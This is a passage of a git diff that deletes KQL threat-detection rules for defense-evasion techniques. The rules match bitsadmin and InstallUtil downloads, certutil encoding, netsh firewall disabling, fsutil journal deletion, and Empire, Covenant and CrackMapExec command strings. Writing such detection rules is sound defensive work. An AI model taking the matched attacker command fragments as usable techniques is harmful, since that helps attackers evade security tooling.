Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/28 -// Level: high -// Description: Detects usage of bitsadmin downloading a file to a suspicious target folder -// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 -DeviceProcessEvents -| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%public%") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file diff --git a/Defense Evasion/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql b/Defense Evasion/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql deleted file mode 100644 index 7c74c2ea..00000000 --- a/Defense Evasion/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/28 -// Level: medium -// Description: Detects usage of bitsadmin downloading a file to uncommon target folder -// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 -DeviceProcessEvents -| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file diff --git a/Defense Evasion/File_Download_Via_InstallUtil.EXE.kql b/Defense Evasion/File_Download_Via_InstallUtil.EXE.kql deleted file mode 100644 index 90991c2d..00000000 --- a/Defense Evasion/File_Download_Via_InstallUtil.EXE.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/19 -// Level: medium -// Description: Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\" - -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\InstallUtil.exe" or ProcessVersionInfoOriginalFileName =~ "InstallUtil.exe") \ No newline at end of file diff --git a/Defense Evasion/File_Download_Via_Windows_Defender_MpCmpRun.EXE.kql b/Defense Evasion/File_Download_Via_Windows_Defender_MpCmpRun.EXE.kql deleted file mode 100644 index c687fb97..00000000 --- a/Defense Evasion/File_Download_Via_Windows_Defender_MpCmpRun.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Matthew Matchen -// Date: 2020/09/04 -// Level: high -// Description: Detects the use of Windows Defender MpCmdRun.EXE to download files -// Tags: attack.defense_evasion, attack.t1218, attack.command_and_control, attack.t1105 -DeviceProcessEvents -| where (ProcessCommandLine contains "DownloadFile" and ProcessCommandLine contains "url") and (ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe" or FolderPath endswith "\\MpCmdRun.exe" or ProcessCommandLine contains "MpCmdRun.exe" or ProcessVersionInfoFileDescription =~ "Microsoft Malware Protection Command Line Utility") \ No newline at end of file diff --git a/Defense Evasion/File_Encoded_To_Base64_Via_Certutil.EXE.kql b/Defense Evasion/File_Encoded_To_Base64_Via_Certutil.EXE.kql deleted file mode 100644 index 2eefdfc1..00000000 --- a/Defense Evasion/File_Encoded_To_Base64_Via_Certutil.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/02/24 -// Level: medium -// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration -// Tags: attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/Defense Evasion/File_In_Suspicious_Location_Encoded_To_Base64_Via_Certutil.EXE.kql b/Defense Evasion/File_In_Suspicious_Location_Encoded_To_Base64_Via_Certutil.EXE.kql deleted file mode 100644 index f034c2e4..00000000 --- a/Defense Evasion/File_In_Suspicious_Location_Encoded_To_Base64_Via_Certutil.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/15 -// Level: high -// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations -// Tags: attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode") and (ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Local\\Temp\\" or ProcessCommandLine contains "\\PerfLogs\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "$Recycle.Bin") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/Defense Evasion/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql b/Defense Evasion/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql deleted file mode 100644 index 03b37b13..00000000 --- a/Defense Evasion/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/28 -// Level: high -// Description: Detects usage of bitsadmin downloading a file with a suspicious extension -// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 -DeviceProcessEvents -| where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".asax" or ProcessCommandLine contains ".ashx" or ProcessCommandLine contains ".asmx" or ProcessCommandLine contains ".asp" or ProcessCommandLine contains ".aspx" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cfm" or ProcessCommandLine contains ".cgi" or ProcessCommandLine contains ".chm" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jsp" or ProcessCommandLine contains ".jspx" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".psm1" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".scf" or ProcessCommandLine contains ".sct" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".war" or ProcessCommandLine contains ".wsf" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".xll" or ProcessCommandLine contains ".zip") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file diff --git a/Defense Evasion/Files_With_System_Process_Name_In_Unsuspected_Locations.kql b/Defense Evasion/Files_With_System_Process_Name_In_Unsuspected_Locations.kql deleted file mode 100644 index 252e71d1..00000000 --- a/Defense Evasion/Files_With_System_Process_Name_In_Unsuspected_Locations.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/05/26 -// Level: medium -// Description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). -It is highly recommended to perform an initial baseline before using this rule in production. - -// Tags: attack.defense_evasion, attack.t1036.005 -DeviceFileEvents -| where (FolderPath endswith "\\AtBroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\backgroundTaskHost.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmdl32.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dasHost.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventcreate.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\extrac32.exe" or FolderPath endswith "\\fontdrvhost.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\iscsicli.exe" or FolderPath endswith "\\iscsicpl.exe" or FolderPath endswith "\\logman.exe" or FolderPath endswith "\\LogonUI.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msinfo32.exe" or FolderPath endswith "\\mstsc.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regini.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchIndexer.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\SecurityHealthService.exe" or FolderPath endswith "\\SecurityHealthSystray.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\ShellAppRuntime.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\SystemSettingsBroker.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\TiWorker.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\w32tm.exe" or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WerFaultSecure.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winrshost.exe" or FolderPath endswith "\\WinRTNetMUAHostServer.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wlrmdr.exe" or FolderPath endswith "\\WmiPrvSE.exe" or FolderPath endswith "\\wslhost.exe" or FolderPath endswith "\\WSReset.exe" or FolderPath endswith "\\WUDFHost.exe" or FolderPath endswith "\\WWAHost.exe") and (not((FolderPath endswith "C:\\Windows\\explorer.exe" or (FolderPath contains "\\SystemRoot\\System32\\" or FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\") or (InitiatingProcessFolderPath endswith "\\SecurityHealthSetup.exe" and FolderPath contains "C:\\Windows\\System32\\SecurityHealth\\" and FolderPath endswith "\\SecurityHealthSystray.exe") or (InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\msiexec.exe" and (FolderPath endswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or FolderPath endswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe")) or (InitiatingProcessFolderPath endswith "C:\\Windows\\system32\\svchost.exe" and FolderPath contains "C:\\Program Files\\WindowsApps\\") or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\wuauclt.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Filter_Driver_Unloaded_Via_Fltmc.EXE.kql b/Defense Evasion/Filter_Driver_Unloaded_Via_Fltmc.EXE.kql deleted file mode 100644 index 3c11c9c1..00000000 --- a/Defense Evasion/Filter_Driver_Unloaded_Via_Fltmc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali -// Date: 2023/02/13 -// Level: high -// Description: Detect filter driver unloading activity via fltmc.exe -// Tags: attack.defense_evasion, attack.t1070, attack.t1562, attack.t1562.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "unload" and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe")) and (not(ProcessCommandLine endswith "unload rtp_filesystem_filter")) \ No newline at end of file diff --git a/Defense Evasion/Findstr_Launching_.lnk_File.kql b/Defense Evasion/Findstr_Launching_.lnk_File.kql deleted file mode 100644 index 64018244..00000000 --- a/Defense Evasion/Findstr_Launching_.lnk_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Trent Liffick -// Date: 2020/05/01 -// Level: medium -// Description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack -// Tags: attack.defense_evasion, attack.t1036, attack.t1202, attack.t1027.003 -DeviceProcessEvents -| where (ProcessCommandLine endswith ".lnk" or ProcessCommandLine endswith ".lnk\"" or ProcessCommandLine endswith ".lnk'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE"))) \ No newline at end of file diff --git a/Defense Evasion/Firewall_Disabled_via_Netsh.EXE.kql b/Defense Evasion/Firewall_Disabled_via_Netsh.EXE.kql deleted file mode 100644 index cd3e65d2..00000000 --- a/Defense Evasion/Firewall_Disabled_via_Netsh.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Fatih Sirin -// Date: 2019/11/01 -// Level: medium -// Description: Detects netsh commands that turns off the Windows firewall -// Tags: attack.defense_evasion, attack.t1562.004, attack.s0108 -DeviceProcessEvents -| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "opmode" and ProcessCommandLine contains "disable") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "state" and ProcessCommandLine contains "off")) \ No newline at end of file diff --git a/Defense Evasion/Firewall_Rule_Deleted_Via_Netsh.EXE.kql b/Defense Evasion/Firewall_Rule_Deleted_Via_Netsh.EXE.kql deleted file mode 100644 index 327f798c..00000000 --- a/Defense Evasion/Firewall_Rule_Deleted_Via_Netsh.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/08/14 -// Level: medium -// Description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh -// Tags: attack.defense_evasion, attack.t1562.004 -DeviceProcessEvents -| where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "delete ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not((ProcessCommandLine contains "name=Dropbox" and InitiatingProcessFolderPath endswith "\\Dropbox.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Firewall_Rule_Update_Via_Netsh.EXE.kql b/Defense Evasion/Firewall_Rule_Update_Via_Netsh.EXE.kql deleted file mode 100644 index d08734e3..00000000 --- a/Defense Evasion/Firewall_Rule_Update_Via_Netsh.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/07/18 -// Level: medium -// Description: Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (ProcessCommandLine contains " firewall " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/Defense Evasion/Folder_Removed_From_Exploit_Guard_ProtectedFolders_List_-_Registry.kql b/Defense Evasion/Folder_Removed_From_Exploit_Guard_ProtectedFolders_List_-_Registry.kql deleted file mode 100644 index a504127b..00000000 --- a/Defense Evasion/Folder_Removed_From_Exploit_Guard_ProtectedFolders_List_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/05 -// Level: high -// Description: Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where ActionType =~ "DeleteValue" and RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\ProtectedFolders" \ No newline at end of file diff --git a/Defense Evasion/Forfiles.EXE_Child_Process_Masquerading.kql b/Defense Evasion/Forfiles.EXE_Child_Process_Masquerading.kql deleted file mode 100644 index 90889ca1..00000000 --- a/Defense Evasion/Forfiles.EXE_Child_Process_Masquerading.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati -// Date: 2024/01/05 -// Level: high -// Description: Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory. - -// Tags: attack.defense_evasion, attack.t1036 -DeviceProcessEvents -| where (ProcessCommandLine startswith "/c echo \"" and FolderPath endswith "\\cmd.exe" and (InitiatingProcessCommandLine endswith ".exe" or InitiatingProcessCommandLine endswith ".exe\"")) and (not(((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\") and FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") and InitiatingProcessFolderPath endswith "\\forfiles.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Fsutil_Suspicious_Invocation.kql b/Defense Evasion/Fsutil_Suspicious_Invocation.kql deleted file mode 100644 index a4ffc9ee..00000000 --- a/Defense Evasion/Fsutil_Suspicious_Invocation.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Ecco, E.M. Anhaus, oscd.community -// Date: 2019/09/26 -// Level: high -// Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). -Might be used by ransomwares during the attack (seen by NotPetya and others). - -// Tags: attack.defense_evasion, attack.impact, attack.t1070, attack.t1485 -DeviceProcessEvents -| where (ProcessCommandLine contains "deletejournal" or ProcessCommandLine contains "createjournal" or ProcessCommandLine contains "setZeroData") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe") \ No newline at end of file diff --git a/Defense Evasion/Gpscript_Execution.kql b/Defense Evasion/Gpscript_Execution.kql deleted file mode 100644 index c9be70bc..00000000 --- a/Defense Evasion/Gpscript_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/05/16 -// Level: medium -// Description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ((ProcessCommandLine contains " /logon" or ProcessCommandLine contains " /startup") and (FolderPath endswith "\\gpscript.exe" or ProcessVersionInfoOriginalFileName =~ "GPSCRIPT.EXE")) and (not(InitiatingProcessCommandLine =~ "C:\\windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc")) \ No newline at end of file diff --git a/Defense Evasion/Greedy_File_Deletion_Using_Del.kql b/Defense Evasion/Greedy_File_Deletion_Using_Del.kql deleted file mode 100644 index f7cc425a..00000000 --- a/Defense Evasion/Greedy_File_Deletion_Using_Del.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 , X__Junior (Nextron Systems) -// Date: 2021/12/02 -// Level: medium -// Description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence. -// Tags: attack.defense_evasion, attack.t1070.004 -DeviceProcessEvents -| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains "\\*.au3" or ProcessCommandLine contains "\\*.dll" or ProcessCommandLine contains "\\*.exe" or ProcessCommandLine contains "\\*.js") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/Defense Evasion/HH.EXE_Execution.kql b/Defense Evasion/HH.EXE_Execution.kql deleted file mode 100644 index 2152b61e..00000000 --- a/Defense Evasion/HH.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community -// Date: 2019/10/24 -// Level: low -// Description: Detects the execution of "hh.exe" to open ".chm" files. -// Tags: attack.defense_evasion, attack.t1218.001 -DeviceProcessEvents -| where ProcessCommandLine contains ".chm" and (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") \ No newline at end of file diff --git a/Defense Evasion/HTML_Help_HH.EXE_Suspicious_Child_Process.kql b/Defense Evasion/HTML_Help_HH.EXE_Suspicious_Child_Process.kql deleted file mode 100644 index 25771e32..00000000 --- a/Defense Evasion/HTML_Help_HH.EXE_Suspicious_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/04/01 -// Level: high -// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe) -// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001 -DeviceProcessEvents -| where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe" \ No newline at end of file diff --git a/Defense Evasion/HackTool_-_Covenant_PowerShell_Launcher.kql b/Defense Evasion/HackTool_-_Covenant_PowerShell_Launcher.kql deleted file mode 100644 index 10ec08bc..00000000 --- a/Defense Evasion/HackTool_-_Covenant_PowerShell_Launcher.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community -// Date: 2020/06/04 -// Level: high -// Description: Detects suspicious command lines used in Covenant luanchers -// Tags: attack.execution, attack.defense_evasion, attack.t1059.001, attack.t1564.003 -DeviceProcessEvents -| where ((ProcessCommandLine contains "-Command" or ProcessCommandLine contains "-EncodedCommand") and (ProcessCommandLine contains "-Sta" and ProcessCommandLine contains "-Nop" and ProcessCommandLine contains "-Window" and ProcessCommandLine contains "Hidden")) or (ProcessCommandLine contains "sv o (New-Object IO.MemorySteam);sv d " or ProcessCommandLine contains "mshta file.hta" or ProcessCommandLine contains "GruntHTTP" or ProcessCommandLine contains "-EncodedCommand cwB2ACAAbwAgA") \ No newline at end of file diff --git a/Defense Evasion/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql b/Defense Evasion/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql deleted file mode 100644 index bc2833d5..00000000 --- a/Defense Evasion/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Thomas Patzke -// Date: 2020/05/22 -// Level: high -// Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule. -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027.005 -DeviceProcessEvents -| where ((ProcessCommandLine contains "join" and ProcessCommandLine contains "split") or ProcessCommandLine contains "( $ShellId[1]+$ShellId[13]+'x')" or (ProcessCommandLine contains "( $PSHome[" and ProcessCommandLine contains "]+$PSHOME[" and ProcessCommandLine contains "]+") or ProcessCommandLine contains "( $env:Public[13]+$env:Public[5]+'x')" or (ProcessCommandLine contains "( $env:ComSpec[4," and ProcessCommandLine contains ",25]-Join'')") or ProcessCommandLine contains "[1,3]+'x'-Join'')") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Defense Evasion/HackTool_-_DInjector_PowerShell_Cradle_Execution.kql b/Defense Evasion/HackTool_-_DInjector_PowerShell_Cradle_Execution.kql deleted file mode 100644 index 1570339a..00000000 --- a/Defense Evasion/HackTool_-_DInjector_PowerShell_Cradle_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/12/07 -// Level: critical -// Description: Detects the use of the Dinject PowerShell cradle based on the specific flags -// Tags: attack.defense_evasion, attack.t1055 -DeviceProcessEvents -| where ProcessCommandLine contains " /am51" and ProcessCommandLine contains " /password" \ No newline at end of file diff --git a/Defense Evasion/HackTool_-_EDRSilencer_Execution.kql b/Defense Evasion/HackTool_-_EDRSilencer_Execution.kql deleted file mode 100644 index 2186bbd5..00000000 --- a/Defense Evasion/HackTool_-_EDRSilencer_Execution.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: @gott_cyber -// Date: 2024/01/02 -// Level: high -// Description: Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information. - -// Tags: attack.defense_evasion, attack.t1562 -DeviceProcessEvents -| where FolderPath endswith "\\EDRSilencer.exe" or ProcessVersionInfoOriginalFileName =~ "EDRSilencer.exe" or ProcessVersionInfoFileDescription contains "EDRSilencer" \ No newline at end of file diff --git a/Defense Evasion/HackTool_-_Empire_PowerShell_UAC_Bypass.kql b/Defense Evasion/HackTool_-_Empire_PowerShell_UAC_Bypass.kql deleted file mode 100644 index a4dbd554..00000000 --- a/Defense Evasion/HackTool_-_Empire_PowerShell_UAC_Bypass.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Ecco -// Date: 2019/08/30 -// Level: critical -// Description: Detects some Empire PowerShell UAC bypass methods -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001 -DeviceProcessEvents -| where ProcessCommandLine contains " -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)" or ProcessCommandLine contains " -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);" \ No newline at end of file diff --git a/Defense Evasion/HackTool_-_F-Secure_C3_Load_by_Rundll32.kql b/Defense Evasion/HackTool_-_F-Secure_C3_Load_by_Rundll32.kql deleted file mode 100644 index fc12c1e8..00000000 --- a/Defense Evasion/HackTool_-_F-Secure_C3_Load_by_Rundll32.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Alfie Champion (ajpc500) -// Date: 2021/06/02 -// Level: critical -// Description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function. -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains ".dll" and ProcessCommandLine contains "StartNodeRelay" \ No newline at end of file diff --git a/Defense Evasion/HackTool_-_GMER_Rootkit_Detector_and_Remover_Execution.kql b/Defense Evasion/HackTool_-_GMER_Rootkit_Detector_and_Remover_Execution.kql deleted file mode 100644 index 7fbc35fb..00000000 --- a/Defense Evasion/HackTool_-_GMER_Rootkit_Detector_and_Remover_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/05 -// Level: high -// Description: Detects the execution GMER tool based on image and hash fields. -// Tags: attack.defense_evasion -DeviceProcessEvents -| where FolderPath endswith "\\gmer.exe" or (MD5 =~ "e9dc058440d321aa17d0600b3ca0ab04" or SHA1 =~ "539c228b6b332f5aa523e5ce358c16647d8bbe57" or SHA256 =~ "e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173") or (MD5 startswith "E9DC058440D321AA17D0600B3CA0AB04" or SHA1 startswith "539C228B6B332F5AA523E5CE358C16647D8BBE57" or SHA256 startswith "E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173") \ No newline at end of file diff --git a/Defense Evasion/HackTool_-_PowerTool_Execution.kql b/Defense Evasion/HackTool_-_PowerTool_Execution.kql deleted file mode 100644 index c9ca0ad1..00000000 --- a/Defense 